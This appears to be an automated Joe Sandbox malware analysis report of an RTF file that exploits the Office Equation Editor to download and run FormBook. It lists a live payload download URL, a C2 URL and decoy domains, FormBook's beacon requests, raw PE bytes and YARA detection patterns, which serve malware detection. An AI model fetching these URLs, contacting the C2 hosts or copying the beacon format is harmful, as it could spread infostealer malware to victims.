Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report c8080fbf_by_Libranalysis

Overview

General Information

Sample Name:c8080fbf_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID:403424
MD5:c8080fbfc825b01f11973566f1a3e589
SHA1:9aa04e64414bef6504b211615f7fcdbe84cd75df
SHA256:af801e43101c06e3366d942715a8b10f90f12ec3437cab1b8a0cc3872101eebe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2688 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • propser16364.exe (PID: 2960 cmdline: C:\Users\user\AppData\Roaming\propser16364.exe MD5: AA6168D4E41CED2091BAEE9F5D59E11E)
      • propser16364.exe (PID: 2860 cmdline: C:\Users\user\AppData\Roaming\propser16364.exe MD5: AA6168D4E41CED2091BAEE9F5D59E11E)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2532 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2856 cmdline: /c del 'C:\Users\user\AppData\Roaming\propser16364.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2488 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shoprodeovegas.com/xcl/"], "decoy": ["sewingtherose.com", "thesmartshareholder.com", "afasyah.com", "marolamusic.com", "lookupgeorgina.com", "plataforyou.com", "dijcan.com", "pawtyparcels.com", "interprediction.com", "fairerfinancehackathon.net", "thehmnshop.com", "jocelynlopez.com", "launcheffecthouston.com", "joyeveryminute.com", "spyforu.com", "ronerasanjuan.com", "gadgetsdesi.com", "nmrconsultants.com", "travellpod.com", "ballparksportscards.com", "milehighcitygames.com", "sophieberiault.com", "2020uselectionresult.com", "instantpeindia.com", "topgradetutors.net", "esveb.com", "rftjrsrv.net", "raphacall.com", "wangrenkai.com", "programme-zeste.com", "idtiam.com", "cruzealmeidaarquitetura.com", "hidbatteries.com", "print12580.com", "realmartagent.com", "tpsmg.com", "mamapacho.com", "rednetmarketing.com", "syuan.xyz", "floryi.com", "photograph-gallery.com", "devarajantraders.com", "amarak-uniform.com", "20190606.com", "retailhutbd.net", "craftbrewllc.com", "myfreezic.com", "crystalwiththecrystalz.com", "ghallagherstudent.com", "britishretailawards.com", "thegoldenwork.com", "dineztheunique.com", "singlelookin.com", "siyuanshe.com", "apgfinancing.com", "slicktechgadgets.com", "wellemade.com", "samytango.com", "centaurme.com", "shuairui.net", "styleket.com", "wpcfences.com", "opolclothing.com", "localiser.site"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.1.propser16364.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.1.propser16364.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.1.propser16364.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        5.1.propser16364.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.1.propser16364.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2688, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2688, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://carbinz.gq/modex/prosperx.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.shoprodeovegas.com/xcl/"], "decoy": ["sewingtherose.com", "thesmartshareholder.com", "afasyah.com", "marolamusic.com", "lookupgeorgina.com", "plataforyou.com", "dijcan.com", "pawtyparcels.com", "interprediction.com", "fairerfinancehackathon.net", "thehmnshop.com", "jocelynlopez.com", "launcheffecthouston.com", "joyeveryminute.com", "spyforu.com", "ronerasanjuan.com", "gadgetsdesi.com", "nmrconsultants.com", "travellpod.com", "ballparksportscards.com", "milehighcitygames.com", "sophieberiault.com", "2020uselectionresult.com", "instantpeindia.com", "topgradetutors.net", "esveb.com", "rftjrsrv.net", "raphacall.com", "wangrenkai.com", "programme-zeste.com", "idtiam.com", "cruzealmeidaarquitetura.com", "hidbatteries.com", "print12580.com", "realmartagent.com", "tpsmg.com", "mamapacho.com", "rednetmarketing.com", "syuan.xyz", "floryi.com", "photograph-gallery.com", "devarajantraders.com", "amarak-uniform.com", "20190606.com", "retailhutbd.net", "craftbrewllc.com", "myfreezic.com", "crystalwiththecrystalz.com", "ghallagherstudent.com", "britishretailawards.com", "thegoldenwork.com", "dineztheunique.com", "singlelookin.com", "siyuanshe.com", "apgfinancing.com", "slicktechgadgets.com", "wellemade.com", "samytango.com", "centaurme.com", "shuairui.net", "styleket.com", "wpcfences.com", "opolclothing.com", "localiser.site"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: carbinz.gqVirustotal: Detection: 11%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeReversingLabs: Detection: 65%
          Source: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dllReversingLabs: Detection: 20%
          Source: C:\Users\user\AppData\Roaming\propser16364.exeReversingLabs: Detection: 65%
          Multi AV Scanner detection for submitted fileShow sources
          Source: c8080fbf_by_Libranalysis.rtfVirustotal: Detection: 50%Perma Link
          Source: c8080fbf_by_Libranalysis.rtfReversingLabs: Detection: 51%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\propser16364.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJoe Sandbox ML: detected
          Source: 5.1.propser16364.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.propser16364.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.propser16364.exe.450000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\propser16364.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\propser16364.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004059F0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,4_2_0040659C
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4x nop then pop edi5_2_0040E445
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop edi7_2_0008E445
          Source: global trafficDNS query: name: carbinz.gq
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.shoprodeovegas.com/xcl/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 May 2021 03:37:00 GMTContent-Type: application/x-msdownloadContent-Length: 233896Last-Modified: Mon, 03 May 2021 00:19:56 GMTConnection: keep-aliveETag: "608f41ac-391a8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
          Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA9687-30AB-4901-9D2A-3CE504568F55}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: carbinz.gq
          Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: propser16364.exe, propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2098818599.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2091126769.00000000002BB000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpeM9
          Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpxe
          Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp2
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
